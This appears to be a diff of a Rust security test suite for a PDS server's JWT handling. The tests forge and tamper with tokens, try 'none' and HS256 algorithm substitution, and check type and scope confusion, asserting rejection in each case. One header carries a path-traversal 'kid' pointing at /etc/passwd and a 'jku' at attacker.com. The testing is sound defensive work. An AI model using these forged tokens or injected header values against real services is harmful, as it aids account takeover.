assert!(err_msg.contains("expired"), "Error: {}", err_msg);
326
}
327
328
#[test]
329
-
fn test_jwt_security_future_iat_accepted() {
330
let key_bytes = generate_user_key();
331
let did = "did:plc:test";
332
-
let header = json!({
333
-
"alg": "ES256K",
334
-
"typ": TOKEN_TYPE_ACCESS
335
});
336
-
let claims = json!({
337
-
"iss": did,
338
-
"sub": did,
339
-
"aud": "did:web:test.pds",
340
-
"iat": Utc::now().timestamp() + 60,
341
-
"exp": Utc::now().timestamp() + 7200,
342
-
"jti": "future-iat-token",
343
-
"scope": SCOPE_ACCESS
344
});
345
-
let token = create_custom_jwt(&header, &claims, &key_bytes);
346
-
let result = verify_access_token(&token, &key_bytes);
347
-
assert!(
348
-
result.is_ok(),
349
-
"Slight future iat should be accepted for clock skew tolerance"
350
-
);
351
-
}
352
353
-
#[test]
354
-
fn test_jwt_security_cross_user_key_attack() {
355
-
let key_bytes_user1 = generate_user_key();
356
-
let key_bytes_user2 = generate_user_key();
357
-
let did = "did:plc:user1";
358
-
let token = create_access_token(did, &key_bytes_user1).expect("create token");
359
-
let result = verify_access_token(&token, &key_bytes_user2);
360
-
assert!(
361
-
result.is_err(),
362
-
"Token signed by user1's key must not verify with user2's key"
363
-
);
364
-
}
365
366
-
#[test]
367
-
fn test_jwt_security_signature_truncation_rejected() {
368
-
let key_bytes = generate_user_key();
369
-
let did = "did:plc:test";
370
-
let token = create_access_token(did, &key_bytes).expect("create token");
371
-
let parts: Vec<&str> = token.split('.').collect();
372
-
let sig_bytes = URL_SAFE_NO_PAD.decode(parts[2]).unwrap();
373
-
let truncated_sig = URL_SAFE_NO_PAD.encode(&sig_bytes[..32]);
374
-
let truncated_token = format!("{}.{}.{}", parts[0], parts[1], truncated_sig);
375
-
let result = verify_access_token(&truncated_token, &key_bytes);
376
-
assert!(result.is_err(), "Truncated signature must be rejected");
377
-
}
378
379
-
#[test]
380
-
fn test_jwt_security_signature_extension_rejected() {
381
-
let key_bytes = generate_user_key();
382
-
let did = "did:plc:test";
383
-
let token = create_access_token(did, &key_bytes).expect("create token");
384
-
let parts: Vec<&str> = token.split('.').collect();
385
-
let mut sig_bytes = URL_SAFE_NO_PAD.decode(parts[2]).unwrap();
386
-
sig_bytes.extend_from_slice(&[0u8; 32]);
387
-
let extended_sig = URL_SAFE_NO_PAD.encode(&sig_bytes);
388
-
let extended_token = format!("{}.{}.{}", parts[0], parts[1], extended_sig);
389
-
let result = verify_access_token(&extended_token, &key_bytes);
390
-
assert!(result.is_err(), "Extended signature must be rejected");
391
}
392
393
#[test]
394
-
fn test_jwt_security_malformed_tokens_rejected() {
395
let key_bytes = generate_user_key();
396
-
let malformed_tokens = vec![
397
-
"",
398
-
"not-a-token",
399
-
"one.two",
400
-
"one.two.three.four",
401
-
"....",
402
-
"eyJhbGciOiJFUzI1NksifQ",
403
-
"eyJhbGciOiJFUzI1NksifQ.",
404
-
"eyJhbGciOiJFUzI1NksifQ..",
405
-
".eyJzdWIiOiJ0ZXN0In0.",
406
-
"!!invalid-base64!!.eyJzdWIiOiJ0ZXN0In0.sig",
407
-
"eyJhbGciOiJFUzI1NksifQ.!!invalid!!.sig",
408
-
];
409
-
for token in malformed_tokens {
410
-
let result = verify_access_token(token, &key_bytes);
411
-
assert!(
412
-
result.is_err(),
413
-
"Malformed token '{}' must be rejected",
414
-
if token.len() > 40 {
415
-
&token[..40]
416
-
} else {
417
-
token
418
-
}
419
-
);
420
-
}
421
-
}
422
423
-
#[test]
424
-
fn test_jwt_security_missing_required_claims_rejected() {
425
-
let key_bytes = generate_user_key();
426
-
let did = "did:plc:test";
427
-
let test_cases = vec![
428
-
(
429
-
json!({
430
-
"iss": did,
431
-
"sub": did,
432
-
"aud": "did:web:test",
433
-
"iat": Utc::now().timestamp(),
434
-
"scope": SCOPE_ACCESS
435
-
}),
436
-
"exp",
437
-
),
438
-
(
439
-
json!({
440
-
"iss": did,
441
-
"sub": did,
442
-
"aud": "did:web:test",
443
-
"exp": Utc::now().timestamp() + 3600,
444
-
"scope": SCOPE_ACCESS
445
-
}),
446
-
"iat",
447
-
),
448
-
(
449
-
json!({
450
-
"iss": did,
451
-
"aud": "did:web:test",
452
-
"iat": Utc::now().timestamp(),
453
-
"exp": Utc::now().timestamp() + 3600,
454
-
"scope": SCOPE_ACCESS
455
-
}),
456
-
"sub",
457
-
),
458
-
];
459
-
for (claims, missing_claim) in test_cases {
460
-
let header = json!({
461
-
"alg": "ES256K",
462
-
"typ": TOKEN_TYPE_ACCESS
463
-
});
464
-
let token = create_custom_jwt(&header, &claims, &key_bytes);
465
-
let result = verify_access_token(&token, &key_bytes);
466
-
assert!(
467
-
result.is_err(),
468
-
"Token missing '{}' claim must be rejected",
469
-
missing_claim
470
-
);
471
}
472
-
}
473
474
-
#[test]
475
-
fn test_jwt_security_invalid_header_json_rejected() {
476
-
let key_bytes = generate_user_key();
477
let invalid_header = URL_SAFE_NO_PAD.encode("{not valid json}");
478
let claims_b64 = URL_SAFE_NO_PAD.encode(r#"{"sub":"test"}"#);
479
let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 64]);
480
-
let malicious_token = format!("{}.{}.{}", invalid_header, claims_b64, fake_sig);
481
-
let result = verify_access_token(&malicious_token, &key_bytes);
482
-
assert!(result.is_err(), "Invalid header JSON must be rejected");
483
-
}
484
485
-
#[test]
486
-
fn test_jwt_security_invalid_claims_json_rejected() {
487
-
let key_bytes = generate_user_key();
488
let header_b64 = URL_SAFE_NO_PAD.encode(r#"{"alg":"ES256K","typ":"at+jwt"}"#);
489
let invalid_claims = URL_SAFE_NO_PAD.encode("{not valid json}");
490
-
let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 64]);
491
-
let malicious_token = format!("{}.{}.{}", header_b64, invalid_claims, fake_sig);
492
-
let result = verify_access_token(&malicious_token, &key_bytes);
493
-
assert!(result.is_err(), "Invalid claims JSON must be rejected");
494
}
495
496
#[test]
497
-
fn test_jwt_security_header_injection_attack() {
498
let key_bytes = generate_user_key();
499
let did = "did:plc:test";
500
-
let header = json!({
501
-
"alg": "ES256K",
502
-
"typ": TOKEN_TYPE_ACCESS,
503
-
"kid": "../../../../../../etc/passwd",
504
-
"jku": "https://attacker.com/keys"
505
-
});
506
-
let claims = json!({
507
-
"iss": did,
508
-
"sub": did,
509
-
"aud": "did:web:test.pds",
510
-
"iat": Utc::now().timestamp(),
511
-
"exp": Utc::now().timestamp() + 3600,
512
-
"jti": "header-injection-token",
513
-
"scope": SCOPE_ACCESS
514
-
});
515
-
let token = create_custom_jwt(&header, &claims, &key_bytes);
516
-
let result = verify_access_token(&token, &key_bytes);
517
-
assert!(
518
-
result.is_ok(),
519
-
"Extra header fields should not cause issues (we ignore them)"
520
-
);
521
-
}
522
523
-
#[test]
524
-
fn test_jwt_security_claims_type_confusion() {
525
-
let key_bytes = generate_user_key();
526
-
let header = json!({
527
-
"alg": "ES256K",
528
-
"typ": TOKEN_TYPE_ACCESS
529
});
530
-
let claims = json!({
531
-
"iss": 12345,
532
-
"sub": ["did:plc:test"],
533
-
"aud": {"url": "did:web:test"},
534
-
"iat": "not a number",
535
-
"exp": "also not a number",
536
-
"jti": null,
537
-
"scope": SCOPE_ACCESS
538
-
});
539
-
let token = create_custom_jwt(&header, &claims, &key_bytes);
540
-
let result = verify_access_token(&token, &key_bytes);
541
-
assert!(result.is_err(), "Claims with wrong types must be rejected");
542
-
}
543
544
-
#[test]
545
-
fn test_jwt_security_unicode_injection_in_claims() {
546
-
let key_bytes = generate_user_key();
547
-
let header = json!({
548
-
"alg": "ES256K",
549
-
"typ": TOKEN_TYPE_ACCESS
550
-
});
551
-
let claims = json!({
552
-
"iss": "did:plc:test\u{0000}attacker",
553
-
"sub": "did:plc:test\u{202E}rekatta",
554
-
"aud": "did:web:test.pds",
555
-
"iat": Utc::now().timestamp(),
556
-
"exp": Utc::now().timestamp() + 3600,
557
-
"jti": "unicode-injection",
558
-
"scope": SCOPE_ACCESS
559
});
560
-
let token = create_custom_jwt(&header, &claims, &key_bytes);
561
-
let result = verify_access_token(&token, &key_bytes);
562
-
if result.is_ok() {
563
-
let data = result.unwrap();
564
-
assert!(
565
-
!data.claims.sub.contains('\0'),
566
-
"Null bytes in claims should be sanitized or rejected"
567
-
);
568
-
}
569
-
}
570
571
-
#[test]
572
-
fn test_jwt_security_signature_verification_is_constant_time() {
573
-
let key_bytes = generate_user_key();
574
-
let did = "did:plc:test";
575
-
let valid_token = create_access_token(did, &key_bytes).expect("create token");
576
-
let parts: Vec<&str> = valid_token.split('.').collect();
577
-
let mut almost_valid = URL_SAFE_NO_PAD.decode(parts[2]).unwrap();
578
-
almost_valid[0] ^= 1;
579
-
let almost_valid_sig = URL_SAFE_NO_PAD.encode(&almost_valid);
580
-
let almost_valid_token = format!("{}.{}.{}", parts[0], parts[1], almost_valid_sig);
581
-
let completely_invalid_sig = URL_SAFE_NO_PAD.encode(&[0xFFu8; 64]);
582
-
let completely_invalid_token = format!("{}.{}.{}", parts[0], parts[1], completely_invalid_sig);
583
-
let _result1 = verify_access_token(&almost_valid_token, &key_bytes);
584
-
let _result2 = verify_access_token(&completely_invalid_token, &key_bytes);
585
-
assert!(
586
-
true,
587
-
"Signature verification should use constant-time comparison (timing attack prevention)"
588
-
);
589
-
}
590
591
-
#[test]
592
-
fn test_jwt_security_valid_scopes_accepted() {
593
-
let key_bytes = generate_user_key();
594
-
let did = "did:plc:test";
595
-
let valid_scopes = vec![SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED];
596
-
for scope in valid_scopes {
597
-
let header = json!({
598
-
"alg": "ES256K",
599
-
"typ": TOKEN_TYPE_ACCESS
600
-
});
601
-
let claims = json!({
602
-
"iss": did,
603
-
"sub": did,
604
-
"aud": "did:web:test.pds",
605
-
"iat": Utc::now().timestamp(),
606
-
"exp": Utc::now().timestamp() + 3600,
607
-
"jti": format!("scope-test-{}", scope),
608
-
"scope": scope
609
-
});
610
-
let token = create_custom_jwt(&header, &claims, &key_bytes);
611
-
let result = verify_access_token(&token, &key_bytes);
612
-
assert!(result.is_ok(), "Valid scope '{}' should be accepted", scope);
613
-
}
614
-
}
615
616
-
#[test]
617
-
fn test_jwt_security_refresh_token_scope_rejected_as_access() {
618
-
let key_bytes = generate_user_key();
619
-
let did = "did:plc:test";
620
-
let header = json!({
621
-
"alg": "ES256K",
622
-
"typ": TOKEN_TYPE_ACCESS
623
});
624
-
let claims = json!({
625
-
"iss": did,
626
-
"sub": did,
627
-
"aud": "did:web:test.pds",
628
-
"iat": Utc::now().timestamp(),
629
-
"exp": Utc::now().timestamp() + 3600,
630
-
"jti": "refresh-scope-access-typ",
631
-
"scope": SCOPE_REFRESH
632
-
});
633
-
let token = create_custom_jwt(&header, &claims, &key_bytes);
634
-
let result = verify_access_token(&token, &key_bytes);
635
-
assert!(
636
-
result.is_err(),
637
-
"Refresh scope with access token type must be rejected"
638
-
);
639
}
640
641
#[test]
642
-
fn test_jwt_security_get_did_extraction_safe() {
643
let key_bytes = generate_user_key();
644
let did = "did:plc:legitimate";
645
let token = create_access_token(did, &key_bytes).expect("create token");
646
-
let extracted = get_did_from_token(&token).expect("extract did");
647
-
assert_eq!(extracted, did);
648
assert!(get_did_from_token("invalid").is_err());
649
assert!(get_did_from_token("a.b").is_err());
650
assert!(get_did_from_token("").is_err());
651
-
let header_b64 = URL_SAFE_NO_PAD.encode(r#"{"alg":"ES256K"}"#);
652
-
let claims_b64 = URL_SAFE_NO_PAD.encode(r#"{"iss":"did:plc:iss","sub":"did:plc:sub"}"#);
653
-
let fake_sig = URL_SAFE_NO_PAD.encode(&[0u8; 64]);
654
-
let unverified_token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig);
655
-
let extracted_unsafe = get_did_from_token(&unverified_token).expect("extract unsafe");
656
-
assert_eq!(
657
-
extracted_unsafe, "did:plc:sub",
658
-
"get_did_from_token extracts sub without verification (by design for lookup)"
659
-
);
660
-
}
661
662
-
#[test]
663
-
fn test_jwt_security_get_jti_extraction_safe() {
664
-
let key_bytes = generate_user_key();
665
-
let did = "did:plc:test";
666
-
let token = create_access_token(did, &key_bytes).expect("create token");
667
-
let jti = get_jti_from_token(&token).expect("extract jti");
668
assert!(!jti.is_empty());
669
assert!(get_jti_from_token("invalid").is_err());
670
-
assert!(get_jti_from_token("a.b").is_err());
671
let header_b64 = URL_SAFE_NO_PAD.encode(r#"{"alg":"ES256K"}"#);
672
-
let claims_b64 = URL_SAFE_NO_PAD.encode(r#"{"iss":"did:plc:test"}"#);
673
let fake_sig = URL_SAFE_NO_PAD.encode(&[0u8; 64]);
674
-
let no_jti_token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig);
675
-
assert!(
676
-
get_jti_from_token(&no_jti_token).is_err(),
677
-
"Missing jti should error"
678
-
);
679
-
}
680
681
-
#[test]
682
-
fn test_jwt_security_key_from_invalid_bytes_rejected() {
683
-
let invalid_keys: Vec<&[u8]> = vec![&[], &[0u8; 31], &[0u8; 33], &[0xFFu8; 32]];
684
-
for key in invalid_keys {
685
-
let result = create_access_token("did:plc:test", key);
686
-
if result.is_ok() {
687
-
let token = result.unwrap();
688
-
let verify_result = verify_access_token(&token, key);
689
-
if verify_result.is_err() {
690
-
continue;
691
-
}
692
-
}
693
-
}
694
}
695
696
#[test]
697
-
fn test_jwt_security_boundary_exp_values() {
698
let key_bytes = generate_user_key();
699
let did = "did:plc:test";
700
-
let header = json!({
701
-
"alg": "ES256K",
702
-
"typ": TOKEN_TYPE_ACCESS
703
-
});
704
-
let now = Utc::now().timestamp();
705
-
let just_expired = json!({
706
-
"iss": did,
707
-
"sub": did,
708
-
"aud": "did:web:test.pds",
709
-
"iat": now - 10,
710
-
"exp": now - 1,
711
-
"jti": "just-expired",
712
-
"scope": SCOPE_ACCESS
713
-
});
714
-
let token1 = create_custom_jwt(&header, &just_expired, &key_bytes);
715
-
assert!(
716
-
verify_access_token(&token1, &key_bytes).is_err(),
717
-
"Just expired token must be rejected"
718
-
);
719
-
let expires_exactly_now = json!({
720
-
"iss": did,
721
-
"sub": did,
722
-
"aud": "did:web:test.pds",
723
-
"iat": now - 10,
724
-
"exp": now,
725
-
"jti": "expires-now",
726
-
"scope": SCOPE_ACCESS
727
-
});
728
-
let token2 = create_custom_jwt(&header, &expires_exactly_now, &key_bytes);
729
-
let result2 = verify_access_token(&token2, &key_bytes);
730
-
assert!(
731
-
result2.is_err() || result2.is_ok(),
732
-
"Token expiring exactly now is a boundary case - either behavior is acceptable"
733
-
);
734
-
}
735
736
-
#[test]
737
-
fn test_jwt_security_very_long_exp_handled() {
738
-
let key_bytes = generate_user_key();
739
-
let did = "did:plc:test";
740
let header = json!({
741
-
"alg": "ES256K",
742
-
"typ": TOKEN_TYPE_ACCESS
743
});
744
let claims = json!({
745
-
"iss": did,
746
-
"sub": did,
747
-
"aud": "did:web:test.pds",
748
-
"iat": Utc::now().timestamp(),
749
-
"exp": i64::MAX,
750
-
"jti": "far-future",
751
-
"scope": SCOPE_ACCESS
752
});
753
-
let token = create_custom_jwt(&header, &claims, &key_bytes);
754
-
let _result = verify_access_token(&token, &key_bytes);
755
-
}
756
757
-
#[test]
758
-
fn test_jwt_security_negative_timestamps_handled() {
759
-
let key_bytes = generate_user_key();
760
-
let did = "did:plc:test";
761
-
let header = json!({
762
-
"alg": "ES256K",
763
-
"typ": TOKEN_TYPE_ACCESS
764
-
});
765
-
let claims = json!({
766
-
"iss": did,
767
-
"sub": did,
768
-
"aud": "did:web:test.pds",
769
-
"iat": -1000000000i64,
770
-
"exp": Utc::now().timestamp() + 3600,
771
-
"jti": "negative-iat",
772
-
"scope": SCOPE_ACCESS
773
-
});
774
-
let token = create_custom_jwt(&header, &claims, &key_bytes);
775
-
let _result = verify_access_token(&token, &key_bytes);
776
}
777
778
#[tokio::test]
779
-
async fn test_jwt_security_server_rejects_forged_session_token() {
780
let url = base_url().await;
781
let http_client = client();
782
let key_bytes = generate_user_key();
783
-
let did = "did:plc:fake-user";
784
-
let forged_token = create_access_token(did, &key_bytes).expect("create forged token");
785
-
let res = http_client
786
-
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
787
.header("Authorization", format!("Bearer {}", forged_token))
788
-
.send()
789
-
.await
790
-
.unwrap();
791
-
assert_eq!(
792
-
res.status(),
793
-
StatusCode::UNAUTHORIZED,
794
-
"Forged session token must be rejected"
795
-
);
796
-
}
797
798
-
#[tokio::test]
799
-
async fn test_jwt_security_server_rejects_expired_token() {
800
-
let url = base_url().await;
801
-
let http_client = client();
802
let (access_jwt, _did) = create_account_and_login(&http_client).await;
803
let parts: Vec<&str> = access_jwt.split('.').collect();
804
let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap();
805
let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap();
806
payload["exp"] = json!(Utc::now().timestamp() - 3600);
807
-
let modified_payload = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
808
-
let tampered_token = format!("{}.{}.{}", parts[0], modified_payload, parts[2]);
809
-
let res = http_client
810
-
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
811
-
.header("Authorization", format!("Bearer {}", tampered_token))
812
-
.send()
813
-
.await
814
-
.unwrap();
815
-
assert_eq!(
816
-
res.status(),
817
-
StatusCode::UNAUTHORIZED,
818
-
"Tampered/expired token must be rejected"
819
-
);
820
-
}
821
822
-
#[tokio::test]
823
-
async fn test_jwt_security_server_rejects_tampered_did() {
824
-
let url = base_url().await;
825
-
let http_client = client();
826
-
let (access_jwt, _did) = create_account_and_login(&http_client).await;
827
-
let parts: Vec<&str> = access_jwt.split('.').collect();
828
-
let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap();
829
-
let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap();
830
-
payload["sub"] = json!("did:plc:attacker");
831
-
payload["iss"] = json!("did:plc:attacker");
832
-
let modified_payload = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
833
-
let tampered_token = format!("{}.{}.{}", parts[0], modified_payload, parts[2]);
834
-
let res = http_client
835
-
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
836
.header("Authorization", format!("Bearer {}", tampered_token))
837
-
.send()
838
-
.await
839
-
.unwrap();
840
-
assert_eq!(
841
-
res.status(),
842
-
StatusCode::UNAUTHORIZED,
843
-
"DID-tampered token must be rejected"
844
-
);
845
}
846
847
#[tokio::test]
848
-
async fn test_jwt_security_refresh_token_replay_protection() {
849
let url = base_url().await;
850
let http_client = client();
851
-
let ts = Utc::now().timestamp_millis();
852
-
let handle = format!("rt-replay-jwt-{}", ts);
853
-
let email = format!("rt-replay-jwt-{}@example.com", ts);
854
-
let password = "test-password-123";
855
-
let create_res = http_client
856
-
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
857
-
.json(&json!({
858
-
"handle": handle,
859
-
"email": email,
860
-
"password": password
861
-
}))
862
-
.send()
863
-
.await
864
-
.unwrap();
865
-
assert_eq!(create_res.status(), StatusCode::OK);
866
-
let account: Value = create_res.json().await.unwrap();
867
-
let did = account["did"].as_str().unwrap();
868
-
let conn_str = get_db_connection_string().await;
869
-
let pool = sqlx::postgres::PgPoolOptions::new()
870
-
.max_connections(2)
871
-
.connect(&conn_str)
872
-
.await
873
-
.expect("Failed to connect to test database");
874
-
let verification_code: String = sqlx::query_scalar!(
875
-
"SELECT code FROM channel_verifications WHERE user_id = (SELECT id FROM users WHERE did = $1) AND channel = 'email'",
876
-
did
877
-
)
878
-
.fetch_one(&pool)
879
-
.await
880
-
.expect("Failed to get verification code");
881
-
let confirm_res = http_client
882
-
.post(format!("{}/xrpc/com.atproto.server.confirmSignup", url))
883
-
.json(&json!({
884
-
"did": did,
885
-
"verificationCode": verification_code
886
-
}))
887
-
.send()
888
-
.await
889
-
.unwrap();
890
-
assert_eq!(confirm_res.status(), StatusCode::OK);
891
-
let confirmed: Value = confirm_res.json().await.unwrap();
892
-
let refresh_jwt = confirmed["refreshJwt"].as_str().unwrap().to_string();
893
-
let first_refresh = http_client
894
-
.post(format!("{}/xrpc/com.atproto.server.refreshSession", url))
895
-
.header("Authorization", format!("Bearer {}", refresh_jwt))
896
-
.send()
897
-
.await
898
-
.unwrap();
899
-
assert_eq!(
900
-
first_refresh.status(),
901
-
StatusCode::OK,
902
-
"First refresh should succeed"
903
-
);
904
-
let replay_res = http_client
905
-
.post(format!("{}/xrpc/com.atproto.server.refreshSession", url))
906
-
.header("Authorization", format!("Bearer {}", refresh_jwt))
907
-
.send()
908
-
.await
909
-
.unwrap();
910
-
assert_eq!(
911
-
replay_res.status(),
912
-
StatusCode::UNAUTHORIZED,
913
-
"Refresh token replay must be rejected"
914
-
);
915
-
}
916
917
-
#[tokio::test]
918
-
async fn test_jwt_security_authorization_header_formats() {
919
-
let url = base_url().await;
920
-
let http_client = client();
921
-
let (access_jwt, _did) = create_account_and_login(&http_client).await;
922
-
let valid_res = http_client
923
-
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
924
.header("Authorization", format!("Bearer {}", access_jwt))
925
-
.send()
926
-
.await
927
-
.unwrap();
928
-
assert_eq!(
929
-
valid_res.status(),
930
-
StatusCode::OK,
931
-
"Valid Bearer format should work"
932
-
);
933
-
let lowercase_res = http_client
934
-
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
935
.header("Authorization", format!("bearer {}", access_jwt))
936
-
.send()
937
-
.await
938
-
.unwrap();
939
-
assert_eq!(
940
-
lowercase_res.status(),
941
-
StatusCode::OK,
942
-
"Lowercase 'bearer' should be accepted (RFC 7235 case-insensitivity)"
943
-
);
944
-
let basic_res = http_client
945
-
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
946
.header("Authorization", format!("Basic {}", access_jwt))
947
-
.send()
948
-
.await
949
-
.unwrap();
950
-
assert_eq!(
951
-
basic_res.status(),
952
-
StatusCode::UNAUTHORIZED,
953
-
"Basic scheme must be rejected"
954
-
);
955
-
let no_scheme_res = http_client
956
-
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
957
.header("Authorization", &access_jwt)
958
-
.send()
959
-
.await
960
-
.unwrap();
961
-
assert_eq!(
962
-
no_scheme_res.status(),
963
-
StatusCode::UNAUTHORIZED,
964
-
"Missing scheme must be rejected"
965
-
);
966
-
let empty_token_res = http_client
967
-
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
968
.header("Authorization", "Bearer ")
969
-
.send()
970
-
.await
971
-
.unwrap();
972
-
assert_eq!(
973
-
empty_token_res.status(),
974
-
StatusCode::UNAUTHORIZED,
975
-
"Empty token must be rejected"
976
-
);
977
}
978
979
#[tokio::test]
980
-
async fn test_jwt_security_deleted_session_rejected() {
981
let url = base_url().await;
982
let http_client = client();
983
let (access_jwt, _did) = create_account_and_login(&http_client).await;
984
-
let get_res = http_client
985
-
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
986
.header("Authorization", format!("Bearer {}", access_jwt))
987
-
.send()
988
-
.await
989
-
.unwrap();
990
-
assert_eq!(
991
-
get_res.status(),
992
-
StatusCode::OK,
993
-
"Token should work before logout"
994
-
);
995
-
let logout_res = http_client
996
-
.post(format!("{}/xrpc/com.atproto.server.deleteSession", url))
997
.header("Authorization", format!("Bearer {}", access_jwt))
998
-
.send()
999
-
.await
1000
-
.unwrap();
1001
-
assert_eq!(logout_res.status(), StatusCode::OK);
1002
-
let after_logout_res = http_client
1003
-
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
1004
.header("Authorization", format!("Bearer {}", access_jwt))
1005
-
.send()
1006
-
.await
1007
-
.unwrap();
1008
-
assert_eq!(
1009
-
after_logout_res.status(),
1010
-
StatusCode::UNAUTHORIZED,
1011
-
"Token must be rejected after logout"
1012
-
);
1013
}
1014
1015
#[tokio::test]
1016
-
async fn test_jwt_security_deactivated_account_rejected() {
1017
let url = base_url().await;
1018
let http_client = client();
1019
let (access_jwt, _did) = create_account_and_login(&http_client).await;
1020
-
let deact_res = http_client
1021
-
.post(format!("{}/xrpc/com.atproto.server.deactivateAccount", url))
1022
.header("Authorization", format!("Bearer {}", access_jwt))
1023
.json(&json!({}))
1024
-
.send()
1025
-
.await
1026
-
.unwrap();
1027
-
assert_eq!(deact_res.status(), StatusCode::OK);
1028
-
let get_res = http_client
1029
-
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
1030
.header("Authorization", format!("Bearer {}", access_jwt))
1031
-
.send()
1032
-
.await
1033
-
.unwrap();
1034
-
assert_eq!(
1035
-
get_res.status(),
1036
-
StatusCode::UNAUTHORIZED,
1037
-
"Deactivated account token must be rejected"
1038
-
);
1039
-
let body: Value = get_res.json().await.unwrap();
1040
assert_eq!(body["error"], "AccountDeactivated");
1041
}
···
38
}
39
40
#[test]
41
+
fn test_signature_attacks() {
42
let key_bytes = generate_user_key();
43
let did = "did:plc:test";
44
let token = create_access_token(did, &key_bytes).expect("create token");
45
let parts: Vec<&str> = token.split('.').collect();
46
+
47
let forged_signature = URL_SAFE_NO_PAD.encode(&[0u8; 64]);
48
let forged_token = format!("{}.{}.{}", parts[0], parts[1], forged_signature);
49
let result = verify_access_token(&forged_token, &key_bytes);
50
assert!(result.is_err(), "Forged signature must be rejected");
51
+
assert!(result.err().unwrap().to_string().to_lowercase().contains("signature"));
52
53
let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap();
54
let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap();
55
payload["sub"] = json!("did:plc:attacker");
56
let modified_payload = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
57
let modified_token = format!("{}.{}.{}", parts[0], modified_payload, parts[2]);
58
+
assert!(verify_access_token(&modified_token, &key_bytes).is_err(), "Modified payload must be rejected");
59
+
60
+
let sig_bytes = URL_SAFE_NO_PAD.decode(parts[2]).unwrap();
61
+
let truncated_sig = URL_SAFE_NO_PAD.encode(&sig_bytes[..32]);
62
+
let truncated_token = format!("{}.{}.{}", parts[0], parts[1], truncated_sig);
63
+
assert!(verify_access_token(&truncated_token, &key_bytes).is_err(), "Truncated signature must be rejected");
64
+
65
+
let mut extended_sig = sig_bytes.clone();
66
+
extended_sig.extend_from_slice(&[0u8; 32]);
67
+
let extended_token = format!("{}.{}.{}", parts[0], parts[1], URL_SAFE_NO_PAD.encode(&extended_sig));
68
+
assert!(verify_access_token(&extended_token, &key_bytes).is_err(), "Extended signature must be rejected");
69
+
70
+
let key_bytes_user2 = generate_user_key();
71
+
assert!(verify_access_token(&token, &key_bytes_user2).is_err(), "Token signed with different key must be rejected");
72
}
73
74
#[test]
75
+
fn test_algorithm_substitution_attacks() {
76
let key_bytes = generate_user_key();
77
let did = "did:plc:test";
78
+
79
+
let none_header = json!({ "alg": "none", "typ": TOKEN_TYPE_ACCESS });
80
let claims = json!({
81
+
"iss": did, "sub": did, "aud": "did:web:test.pds",
82
+
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600,
83
+
"jti": "attack-token", "scope": SCOPE_ACCESS
84
});
85
+
let none_token = create_unsigned_jwt(&none_header, &claims);
86
+
assert!(verify_access_token(&none_token, &key_bytes).is_err(), "Algorithm 'none' must be rejected");
87
88
+
let hs256_header = json!({ "alg": "HS256", "typ": TOKEN_TYPE_ACCESS });
89
+
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&hs256_header).unwrap());
90
let claims_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&claims).unwrap());
91
use hmac::{Hmac, Mac};
92
type HmacSha256 = Hmac<Sha256>;
···
94
let mut mac = HmacSha256::new_from_slice(&key_bytes).unwrap();
95
mac.update(message.as_bytes());
96
let hmac_sig = mac.finalize().into_bytes();
97
+
let hs256_token = format!("{}.{}", message, URL_SAFE_NO_PAD.encode(&hmac_sig));
98
+
assert!(verify_access_token(&hs256_token, &key_bytes).is_err(), "HS256 substitution must be rejected");
99
100
+
for (alg, sig_len) in [("RS256", 256), ("ES256", 64)] {
101
+
let header = json!({ "alg": alg, "typ": TOKEN_TYPE_ACCESS });
102
+
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap());
103
+
let fake_sig = URL_SAFE_NO_PAD.encode(&vec![1u8; sig_len]);
104
+
let token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig);
105
+
assert!(verify_access_token(&token, &key_bytes).is_err(), "{} substitution must be rejected", alg);
106
+
}
107
}
108
109
#[test]
110
+
fn test_token_type_confusion() {
111
let key_bytes = generate_user_key();
112
let did = "did:plc:test";
113
114
let refresh_token = create_refresh_token(did, &key_bytes).expect("create refresh token");
115
let result = verify_access_token(&refresh_token, &key_bytes);
116
+
assert!(result.is_err(), "Refresh token as access must be rejected");
117
+
assert!(result.err().unwrap().to_string().contains("Invalid token type"));
118
119
let access_token = create_access_token(did, &key_bytes).expect("create access token");
120
let result = verify_refresh_token(&access_token, &key_bytes);
121
+
assert!(result.is_err(), "Access token as refresh must be rejected");
122
+
assert!(result.err().unwrap().to_string().contains("Invalid token type"));
123
124
+
let service_token = create_service_token(did, "did:web:target", "com.example.method", &key_bytes).unwrap();
125
+
assert!(verify_access_token(&service_token, &key_bytes).is_err(), "Service token as access must be rejected");
126
}
127
128
#[test]
129
+
fn test_scope_validation() {
130
let key_bytes = generate_user_key();
131
let did = "did:plc:test";
132
+
let header = json!({ "alg": "ES256K", "typ": TOKEN_TYPE_ACCESS });
133
134
+
let invalid_scope = json!({
135
+
"iss": did, "sub": did, "aud": "did:web:test.pds",
136
+
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600,
137
+
"jti": "test", "scope": "admin.all"
138
});
139
+
